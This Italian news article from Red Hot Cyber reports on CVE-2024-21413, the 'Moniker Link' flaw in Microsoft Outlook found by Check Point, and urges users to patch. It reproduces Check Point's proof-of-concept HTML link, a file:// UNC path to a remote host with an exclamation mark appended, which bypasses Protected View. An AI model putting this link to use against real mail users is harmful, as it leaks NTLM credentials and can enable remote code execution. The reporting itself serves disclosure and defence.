Red Hot Cyber
Condividi la tua difesa. Incoraggia l'eccellenza. La vera forza della cybersecurity risiede nell'effetto moltiplicatore della conoscenza.
Redazione RHC : 25 Febbraio 2024 08:39
Microsoft segnala che aggressori remoti non autenticati potrebbero sfruttare la vulnerabilità critica in Outlook. Tale bug potrebbe aggirare Office Protected View e ottenere l’esecuzione remota di codice arbitrario.
Questa vulnerabilità è stata scoperta dai ricercatori di Check Point e ha ricevuto l’identificatore CVE-2024-21413. Interessa numerosi prodotti Office, tra cui Microsoft Office LTSC 2021 e Microsoft 365 Apps for Enterprise, nonché Microsoft Outlook 2016 e Microsoft Office 2019.
Il bug porta all’esecuzione di codice in modalità remota quando si aprono e-mail con collegamenti dannosi utilizzando una versione vulnerabile di Microsoft Outlook. Il problema è che il bug consente di aggirare la Visualizzazione protetta. Si tratta di un meccanismo progettato per bloccare i contenuti dannosi incorporati nei file di Office e aprire i file di Office dannosi in modalità di modifica.
 Vuoi diventare un esperto del Dark Web e della Cyber Threat Intelligence (CTI)? Stiamo per avviare il corso intermedio in modalità "Live Class" del corso "Dark Web & Cyber Threat Intelligence". A differenza dei corsi in e-learning, disponibili online sulla nostra piattaforma con lezioni pre-registrate, i corsi in Live Class offrono un’esperienza formativa interattiva e coinvolgente. Condotti dal professor Pietro Melillo, le lezioni si svolgono online in tempo reale, permettendo ai partecipanti di interagire direttamente con il docente e approfondire i contenuti in modo personalizzato. Questi corsi, ideali per aziende, consentono di sviluppare competenze mirate, affrontare casi pratici e personalizzare il percorso formativo in base alle esigenze specifiche del team, garantendo un apprendimento efficace e immediatamente applicabile. Guarda subito l'anteprima gratuita del corso su academy.redhotcyber.com Contattaci per ulteriori informazioni tramite WhatsApp al 375 593 1011 oppure scrivi a [email protected]
Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì. |
Gli sviluppatori hanno avvertito che le anteprime possono diventare anche un vettore di attacco. Questo poiché il CVE-2024-21413 può essere sfruttato anche attraverso l’anteprima di documenti dannosi.
“Un utente malintenzionato che sfrutta con successo questa vulnerabilità potrebbe ottenere privilegi elevati, comprese funzioni di lettura, scrittura ed eliminazione”, spiega Microsoft . “Un utente malintenzionato potrebbe creare un collegamento dannoso per aggirare la Visualizzazione protetta, portando alla perdita delle credenziali NTLM locali e all’esecuzione di codice remoto (RCE).”
Gli analisti di Check Point chiamano la vulnerabilità Moniker Link e affermano che consente di aggirare la protezione di Outlook contro i collegamenti dannosi incorporati nelle e-mail tramite file://. Devi solo aggiungere un punto esclamativo all’URL, che punta ai server controllati dagli aggressori.
Un punto esclamativo viene aggiunto immediatamente dopo l’espansione del documento, insieme al testo libero (Check Point ha utilizzato la parola “qualcosa” nell’esempio):*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
Questo collegamento ignora le restrizioni di Outlook e Outlook accede alla risorsa remota \\\10.10.111.111\test\test.rtf quando si fa clic sul collegamento, senza visualizzare avvisi o errori.
Secondo i ricercatori, la vulnerabilità è legata all’API MkParseDisplayName, quindi potrebbe influenzare altri software che la utilizzano.
“Anche altre edizioni e versioni di Office sono probabilmente interessate da questo problema. In effetti, riteniamo che questo bug non sia stato rilevato ed esista nell’ecosistema Windows/COM da decenni perché è basato sull’API COM. Consigliamo vivamente a tutti gli utenti di Outlook di installare la patch ufficiale il prima possibile”, scrive Check Point.
RedazioneNel panorama dei forum underground esistono attori che operano in modo episodico, alla ricerca di un singolo colpo mediatico, e altri che costruiscono nel tempo una pipeline quasi industriale di comp...
Nel contesto odierno, proteggere una rete richiede molto più che impostare una password complessa. Un attacco informatico contro una rete wireless segue un percorso strutturato che evolve dal monitor...
Il DPO, ma anche il consulente privacy, interagisce in modo significativo con il mondo dell’IT. Purtroppo non sempre lo fa in modo corretto, soprattutto perché alcuni falsi miti provocano quel rumo...
Il post 462 del canale ufficiale di Durov ha attivato subito la “modalità urlo”: “Fine dell’internet libero. L’internet libero sta diventando uno strumento di controllo”. Niente auguri pe...
Il mercato clandestino del cybercrime continua a evolversi rapidamente, alimentato da gruppi specializzati che progettano e vendono strumenti per truffe digitali sempre più sofisticate. Tra questi, u...
